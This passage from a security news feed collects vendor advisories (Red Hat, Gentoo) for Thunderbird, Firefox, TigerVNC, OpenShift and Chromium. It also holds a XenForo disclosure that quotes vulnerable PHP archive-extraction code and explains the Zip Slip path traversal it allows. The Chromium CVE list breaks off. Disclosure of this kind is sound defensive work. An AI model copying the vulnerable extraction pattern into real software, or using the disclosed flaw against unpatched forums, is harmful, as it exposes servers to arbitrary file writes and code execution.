Red Hat Security Advisory 2024-0619-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include bypass, out of bounds write, and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0619.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0619-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0619  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2024-0741  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.7.0.

Security Fix(es):

* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)

* Mozilla: Failure to update user input timestamp (CVE-2024-0742)

* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)

* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)

* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)

* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)

* Mozilla: Privilege escalation through devtools (CVE-2024-0751)

* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)

* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0741

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2259926  
https://bugzilla.redhat.com/show_bug.cgi?id=2259927  
https://bugzilla.redhat.com/show_bug.cgi?id=2259928  
https://bugzilla.redhat.com/show_bug.cgi?id=2259929  
https://bugzilla.redhat.com/show_bug.cgi?id=2259930  
https://bugzilla.redhat.com/show_bug.cgi?id=2259931  
https://bugzilla.redhat.com/show_bug.cgi?id=2259932  
https://bugzilla.redhat.com/show_bug.cgi?id=2259933  
https://bugzilla.redhat.com/show_bug.cgi?id=2259934

Red Hat Security Advisory 2024-0619-03

Red Hat Security Advisory 2024-0618-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include bypass, out of bounds write, and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0618.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0618-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0618  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2024-0741  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.7.0 ESR.

Security Fix(es):

* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)

* Mozilla: Failure to update user input timestamp (CVE-2024-0742)

* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)

* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)

* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)

* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)

* Mozilla: Privilege escalation through devtools (CVE-2024-0751)

* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)

* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0741

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2259926  
https://bugzilla.redhat.com/show_bug.cgi?id=2259927  
https://bugzilla.redhat.com/show_bug.cgi?id=2259928  
https://bugzilla.redhat.com/show_bug.cgi?id=2259929  
https://bugzilla.redhat.com/show_bug.cgi?id=2259930  
https://bugzilla.redhat.com/show_bug.cgi?id=2259931  
https://bugzilla.redhat.com/show_bug.cgi?id=2259932  
https://bugzilla.redhat.com/show_bug.cgi?id=2259933  
https://bugzilla.redhat.com/show_bug.cgi?id=2259934

Red Hat Security Advisory 2024-0618-03

Red Hat Security Advisory 2024-0617-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0617.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2024:0617-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0617Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-6816====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6816References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2256540https://bugzilla.redhat.com/show_bug.cgi?id=2256542https://bugzilla.redhat.com/show_bug.cgi?id=2256690https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Red Hat Security Advisory 2024-0617-03

Red Hat Security Advisory 2024-0489-03 - Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0489.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.12.48 packages and security update  
Advisory ID:        RHSA-2024:0489-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0489  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2023-47108  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.48. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:0485

Security Fix(es):

* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound  
cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-47108

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198

Red Hat Security Advisory 2024-0489-03

Red Hat Security Advisory 2024-0485-03 - Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a cross site scripting vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0485.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.48 bug fix and security update  
Advisory ID:        RHSA-2024:0485-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0485  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2022-32190  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.48. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:0489

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* openshift: incomplete fix for Rapid Reset (CVE-2023-44487/CVE-2023-39325) (CVE-2023-6596)

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-39325)

* golang: net/url: JoinPath does not strip relative path components in all circumstances (CVE-2022-32190)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)

* golang.org/x/net/html: Cross site scripting (CVE-2023-3978)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2022-32190

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2124668  
https://bugzilla.redhat.com/show_bug.cgi?id=2178358  
https://bugzilla.redhat.com/show_bug.cgi?id=2228689  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2253521  
https://issues.redhat.com/browse/OCPBUGS-14071  
https://issues.redhat.com/browse/OCPBUGS-22736  
https://issues.redhat.com/browse/OCPBUGS-23981  
https://issues.redhat.com/browse/OCPBUGS-24039  
https://issues.redhat.com/browse/OCPBUGS-24420  
https://issues.redhat.com/browse/OCPBUGS-25593  
https://issues.redhat.com/browse/OCPBUGS-25675  
https://issues.redhat.com/browse/OCPBUGS-25815  
https://issues.redhat.com/browse/OCPBUGS-26569  
https://issues.redhat.com/browse/OCPBUGS-27102

Red Hat Security Advisory 2024-0485-03

XenForo versions 2.2.13 and below suffer from a zip slip filename traversal vulnerability in ArchiveImport.php.

------------------------------------------------------------  
XenForo <= 2.2.13 (ArchiveImport.php) Zip Slip Vulnerability  
------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.13 and prior versions.

[-] Vulnerability Description:

The vulnerability is located in the  
/src/XF/Service/Style/ArchiveImport.php script. Specifically, into the  
"ArchiveImport::extractFilesToTempDir()" method:

198. public function extractFilesToTempDir()  
199. {  
200. $zip = $this->zip();  
201. $DS = \XF::$DS;  
202.  
203. if ($this->extracted)  
204. {  
205. return;  
206. }  
207.  
208. for ($i = 0; $i < $zip->numFiles; $i++)  
209. {  
210. $zipFileName = $zip->getNameIndex($i);  
211. $fsFileName = $this->getFsFileNameFromZipName($zipFileName);  
212. if ($fsFileName === null)  
213. {  
214. continue;  
215. }  
216.  
217. $finalFileName = $this->tempDir . $DS . $fsFileName;  
218.  
219. $dataStream = $zip->getStream($zipFileName);  
220. @File::writeFile($finalFileName, $dataStream, false);  
221. }

The vulnerability exists because the above code is using the filename  
provided within the Zip archive ($zipFileName variable created at line  
210) to write the extracted file by using "File::writeFile()" at line  
220, without properly verifying whether it contains Path Traversal  
sequences. This could be exploited to carry out Zip Slip (or Path  
Traversal) attacks and write/overwrite arbitrary files on the web  
server, resulting in execution of arbitrary PHP code or other security  
impacts. Successful exploitation of this vulnerability requires an  
account with permissions to administer styles.

[-] Solution:

Upgrade to version 2.2.14 or later.

[-] Disclosure Timeline:

[02-01-2024] - Vendor notified  
[17-01-2024] - CVE identifier requested  
[24-01-2024] - Vendor replied a fix will be available in the next release  
[30-01-2024] - Version 2.2.14 released  
[30-01-2024] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
not assigned a CVE identifier for this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/tickets/BC37EB98/?v=5da7bd5728

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-01

XenForo 2.2.13 ArchiveImport.php Zip Slip

Gentoo Linux Security Advisory 202401-34 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 120.0.6099.109 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202401-34- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities     Date: January 31, 2024     Bugs: #907999, #908471, #909283, #910522, #911675, #912364, #913016, #913710, #914350, #914871, #915137, #915560, #915961, #916252, #916620, #917021, #917357, #918882, #919321, #919802, #920442, #921337       ID: 202401-34- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been discovered in Chromium and itsderivatives, the worst of which can lead to remote code execution.Background==========Chromium is an open-source browser project that aims to build a safer,faster, and more stable way for all users to experience the web.Google Chrome is one fast, simple, and secure browser for all yourdevices.Microsoft Edge is a browser that combines a minimal design withsophisticated technology to make the web faster, safer, and easier.Affected packages=================Package                    Vulnerable        Unaffected-------------------------  ----------------  -----------------www-client/chromium        < 120.0.6099.109  >= 120.0.6099.109www-client/google-chrome   < 120.0.6099.109  >= 120.0.6099.109www-client/microsoft-edge  < 120.0.2210.133  >= 120.0.2210.133Description===========Multiple vulnerabilities have been discovered in Chromium and itsderivatives. Please review the CVE identifiers referenced below fordetails.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Google Chrome users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-120.0.6099.109"All Chromium users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/chromium-120.0.6099.109"All Microsoft Edge users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.133"References==========[ 1 ] CVE-2023-2312      https://nvd.nist.gov/vuln/detail/CVE-2023-2312[ 2 ] CVE-2023-2929      https://nvd.nist.gov/vuln/detail/CVE-2023-2929[ 3 ] CVE-2023-2930      https://nvd.nist.gov/vuln/detail/CVE-2023-2930[ 4 ] CVE-2023-2931      https://nvd.nist.gov/vuln/detail/CVE-2023-2931[ 5 ] CVE-2023-2932      https://nvd.nist.gov/vuln/detail/CVE-2023-2932[ 6 ] CVE-2023-2933      https://nvd.nist.gov/vuln/detail/CVE-2023-2933[ 7 ] CVE-2023-2934      https://nvd.nist.gov/vuln/detail/CVE-2023-2934[ 8 ] CVE-2023-2935      https://nvd.nist.gov/vuln/detail/CVE-2023-2935[ 9 ] CVE-2023-2936      https://nvd.nist.gov/vuln/detail/CVE-2023-2936[ 10 ] CVE-2023-2937      https://nvd.nist.gov/vuln/detail/CVE-2023-2937[ 11 ] CVE-2023-2938      https://nvd.nist.gov/vuln/detail/CVE-2023-2938[ 12 ] CVE-2023-2939      https://nvd.nist.gov/vuln/detail/CVE-2023-2939[ 13 ] CVE-2023-2940      https://nvd.nist.gov/vuln/detail/CVE-2023-2940[ 14 ] CVE-2023-2941      https://nvd.nist.gov/vuln/detail/CVE-2023-2941[ 15 ] CVE-2023-3079      https://nvd.nist.gov/vuln/detail/CVE-2023-3079[ 16 ] CVE-2023-3214      https://nvd.nist.gov/vuln/detail/CVE-2023-3214[ 17 ] CVE-2023-3215      https://nvd.nist.gov/vuln/detail/CVE-2023-3215[ 18 ] CVE-2023-3216      https://nvd.nist.gov/vuln/detail/CVE-2023-3216[ 19 ] CVE-2023-3217      https://nvd.nist.gov/vuln/detail/CVE-2023-3217[ 20 ] CVE-2023-3420      https://nvd.nist.gov/vuln/detail/CVE-2023-3420[ 21 ] CVE-2023-3421      https://nvd.nist.gov/vuln/detail/CVE-2023-3421[ 22 ] CVE-2023-3422      https://nvd.nist.gov/vuln/detail/CVE-2023-3422[ 23 ] CVE-2023-3727      https://nvd.nist.gov/vuln/detail/CVE-2023-3727[ 24 ] CVE-2023-3728      https://nvd.nist.gov/vuln/detail/CVE-2023-3728[ 25 ] CVE-2023-3730      https://nvd.nist.gov/vuln/detail/CVE-2023-3730[ 26 ] CVE-2023-3732      https://nvd.nist.gov/vuln/detail/CVE-2023-3732[ 27 ] CVE-2023-3733      https://nvd.nist.gov/vuln/detail/CVE-2023-3733[ 28 ] CVE-2023-3734      https://nvd.nist.gov/vuln/detail/CVE-2023-3734[ 29 ] CVE-2023-3735      https://nvd.nist.gov/vuln/detail/CVE-2023-3735[ 30 ] CVE-2023-3736      https://nvd.nist.gov/vuln/detail/CVE-2023-3736[ 31 ] CVE-2023-3737      https://nvd.nist.gov/vuln/detail/CVE-2023-3737[ 32 ] CVE-2023-3738      https://nvd.nist.gov/vuln/detail/CVE-2023-3738[ 33 ] CVE-2023-3740      https://nvd.nist.gov/vuln/detail/CVE-2023-3740[ 34 ] CVE-2023-4068      https://nvd.nist.gov/vuln/detail/CVE-2023-4068[ 35 ] CVE-2023-4069      https://nvd.nist.gov/vuln/detail/CVE-2023-4069[ 36 ] CVE-2023-4070      https://nvd.nist.gov/vuln/detail/CVE-2023-4070[ 37 ] CVE-2023-4071      https://nvd.nist.gov/vuln/detail/CVE-2023-4071[ 38 ] CVE-2023-4072      https://nvd.nist.gov/vuln/detail/CVE-2023-4072[ 39 ] CVE-2023-4073      https://nvd.nist.gov/vuln/detail/CVE-2023-4073[ 40 ] CVE-2023-4074      https://nvd.nist.gov/vuln/detail/CVE-2023-4074[ 41 ] CVE-2023-4075      https://nvd.nist.gov/vuln/detail/CVE-2023-4075[ 42 ] CVE-2023-4076      https://nvd.nist.gov/vuln/detail/CVE-2023-4076[ 43 ] CVE-2023-4077      https://nvd.nist.gov/vuln/detail/CVE-2023-4077[ 44 ] CVE-2023-4078      https://nvd.nist.gov/vuln/detail/CVE-2023-4078[ 45 ] CVE-2023-4349      https://nvd.nist.gov/vuln/detail/CVE-2023-4349[ 46 ] CVE-2023-4350      https://nvd.nist.gov/vuln/detail/CVE-2023-4350[ 47 ] CVE-2023-4351      https://nvd.nist.gov/vuln/detail/CVE-2023-4351[ 48 ] CVE-2023-4352      https://nvd.nist.gov/vuln/detail/CVE-2023-4352[ 49 ] CVE-2023-4353      https://nvd.nist.gov/vuln/detail/CVE-2023-4353[ 50 ] CVE-2023-4354      https://nvd.nist.gov/vuln/detail/CVE-2023-4354[ 51 ] CVE-2023-4355      https://nvd.nist.gov/vuln/detail/CVE-2023-4355[ 52 ] CVE-2023-4356      https://nvd.nist.gov/vuln/detail/CVE-2023-4356[ 53 ] CVE-2023-4357      https://nvd.nist.gov/vuln/detail/CVE-2023-4357[ 54 ] CVE-2023-4358      https://nvd.nist.gov/vuln/detail/CVE-2023-4358[ 55 ] CVE-2023-4359      https://nvd.nist.gov/vuln/detail/CVE-2023-4359[ 56 ] CVE-2023-4360      https://nvd.nist.gov/vuln/detail/CVE-2023-4360[ 57 ] CVE-2023-4361      https://nvd.nist.gov/vuln/detail/CVE-2023-4361[ 58 ] CVE-2023-4362      https://nvd.nist.gov/vuln/detail/CVE-2023-4362[ 59 ] CVE-2023-4363      https://nvd.nist.gov/vuln/detail/CVE-2023-4363[ 60 ] CVE-2023-4364      https://nvd.nist.gov/vuln/detail/CVE-2023-4364[ 61 ] CVE-2023-4365      https://nvd.nist.gov/vuln/detail/CVE-2023-4365[ 62 ] CVE-2023-4366      https://nvd.nist.gov/vuln/detail/CVE-2023-4366[ 63 ] CVE-2023-4367      https://nvd.nist.gov/vuln/detail/CVE-2023-4367[ 64 ] CVE-2023-4368      https://nvd.nist.gov/vuln/detail/CVE-2023-4368[ 65 ] CVE-2023-4427      https://nvd.nist.gov/vuln/detail/CVE-2023-4427[ 66 ] CVE-2023-4428      https://nvd.nist.gov/vuln/detail/CVE-2023-4428[ 67 ] CVE-2023-4429      https://nvd.nist.gov/vuln/detail/CVE-2023-4429[ 68 ] CVE-2023-4430      https://nvd.nist.gov/vuln/detail/CVE-2023-4430[ 69 ] CVE-2023-4431      https://nvd.nist.gov/vuln/detail/CVE-2023-4431[ 70 ] CVE-2023-4572      https://nvd.nist.gov/vuln/detail/CVE-2023-4572[ 71 ] CVE-2023-4761      https://nvd.nist.gov/vuln/detail/CVE-2023-4761[ 72 ] CVE-2023-4762      https://nvd.nist.gov/vuln/detail/CVE-2023-4762[ 73 ] CVE-2023-4763      https://nvd.nist.gov/vuln/detail/CVE-2023-4763[ 74 ] CVE-2023-4764      https://nvd.nist.gov/vuln/detail/CVE-2023-4764[ 75 ] CVE-2023-4900      https://nvd.nist.gov/vuln/detail/CVE-2023-4900[ 76 ] CVE-2023-4901      https://nvd.nist.gov/vuln/detail/CVE-2023-4901[ 77 ] CVE-2023-4902      https://nvd.nist.gov/vuln/detail/CVE-2023-4902[ 78 ] CVE-2023-4903      https://nvd.nist.gov/vuln/detail/CVE-2023-4903[ 79 ] CVE-2023-4904      https://nvd.nist.gov/vuln/detail/CVE-2023-4904[ 80 ] CVE-2023-4905      https://nvd.nist.gov/vuln/detail/CVE-2023-4905[ 81 ] CVE-2023-4906      https://nvd.nist.gov/vuln/detail/CVE-2023-4906[ 82 ] CVE-2023-4907      https://nvd.nist.gov/vuln/detail/CVE-2023-4907[ 83 ] CVE-2023-4908      https://nvd.nist.gov/vuln/detail/CVE-2023-4908[ 84 ] CVE-2023-4909      https://nvd.nist.gov/vuln/detail/CVE-2023-4909[ 85 ] CVE-2023-5186      https://nvd.nist.gov/vuln/detail/CVE-2023-5186[ 86 ] CVE-2023-5187      https://nvd.nist.gov/vuln/detail/CVE-2023-5187[ 87 ] CVE-2023-5217      https://nvd.nist.gov/vuln/detail/CVE-2023-5217[ 88 ] CVE-2023-5218      https://nvd.nist.gov/vuln/detail/CVE-2023-5218[ 89 ] CVE-2023-5346      https://nvd.nist.gov/vuln/detail/CVE-2023-5346[ 90 ] CVE-2023-5472      https://nvd.nist.gov/vuln/detail/CVE-2023-5472[ 91 ] CVE-2023-5473      https://nvd.nist.gov/vuln/detail/CVE-2023-5473[ 92 ] CVE-2023-5474      https://nvd.nist.gov/vuln/detail/CVE-2023-5474[ 93 ] CVE-2023-5475      https://nvd.nist.gov/vuln/detail/CVE-2023-5475[ 94 ] CVE-2023-5476      https://nvd.nist.gov/vuln/detail/CVE-2023-5476[ 95 ] CVE-2023-5477      https://nvd.nist.gov/vuln/detail/CVE-2023-5477[ 96 ] CVE-2023-5478      https://nvd.nist.gov/vuln/detail/CVE-2023-5478[ 97 ] CVE-2023-5479      https://nvd.nist.gov/vuln/detail/CVE-2023-5479[ 98 ] CVE-2023-5480      https://nvd.nist.gov/vuln/detail/CVE-2023-5480[ 99 ] CVE-2023-5481      https://nvd.nist.gov/vuln/detail/CVE-2023-5481[ 100 ] CVE-2023-5482      https://nvd.nist.gov/vuln/detail/CVE-2023-5482[ 101 ] CVE-2023-5483      https://nvd.nist.gov/vuln/detail/CVE-2023-5483[ 102 ] CVE-2023-5484      https://nvd.nist.gov/vuln/detail/CVE-2023-5484[ 103 ] CVE-2023-5485      https://nvd.nist.gov/vuln/detail/CVE-2023-5485[ 104 ] CVE-2023-5486      https://nvd.nist.gov/vuln/detail/CVE-2023-5486[ 105 ] CVE-2023-5487      https://nvd.nist.gov/vuln/detail/CVE-2023-5487[ 106 ] CVE-2023-5849      https://nvd.nist.gov/vuln/detail/CVE-2023-5849[ 107 ] CVE-2023-5850      https://nvd.nist.gov/vuln/detail/CVE-2023-5850[ 108 ] CVE-2023-5851      https://nvd.nist.gov/vuln/detail/CVE-2023-5851[ 109 ] CVE-2023-5852      https://nvd.nist.gov/vuln/detail/CVE-2023-5852[ 110 ] CVE-2023-5853      https://nvd.nist.gov/vuln/detail/CVE-2023-5853[ 111 ] CVE-2023-5854      https://nvd.nist.gov/vuln/detail/CVE-2023-5854[ 112 ] CVE-2023-5855      https://nvd.nist.gov/vuln/detail/CVE-2023-5855[ 113 ] CVE-2023-5856      https://nvd.nist.gov/vuln/detail/CVE-2023-5856[ 114 ] CVE-2023-5857      https://nvd.nist.gov/vuln/detail/CVE-2023-5857[ 115 ] CVE-2023-5858      https://nvd.nist.gov/vuln/detail/CVE-2023-5858[ 116 ] CVE-2023-5859      https://nvd.nist.gov/vuln/detail/CVE-2023-5859[ 117 ] CVE-2023-5996      https://nvd.nist.gov/vuln/detail/CVE-2023-5996[ 118 ] CVE-2023-5997      https://nvd.nist.gov/vuln/detail/CVE-2023-5997[ 119 ] CVE-2023-6112      https://nvd.nist.gov/vuln/detail/CVE-2023-6112[ 120 ] CVE-2023-6345      https://nvd.nist.gov/vuln/detail/CVE-2023-6345[ 121 ] CVE-2023-6346      https://nvd.nist.gov/vuln/detail/CVE-2023-6346[ 122 ] CVE-2023-6347      https://nvd.nist.gov/vuln/detail/CVE-2023-6347[ 123 ] CVE-2023-6348      https://nvd.nist.gov/vuln/detail/CVE-2023-6348[ 124 ] CVE-2023-6350      https://nvd.nist.gov/vuln/detail/CVE-2023-6350[ 125 ] CVE-2023-6351      https://nvd.nist.gov/vuln/detail/CVE-2023-6351[ 126 ] CVE-2023-6508      https://nvd.nist.gov/vuln/detail/CVE-2023-6508[ 127 ] CVE-2023-6509      https://nvd.nist.gov/vuln/detail/CVE-2023-6509[ 128 ] 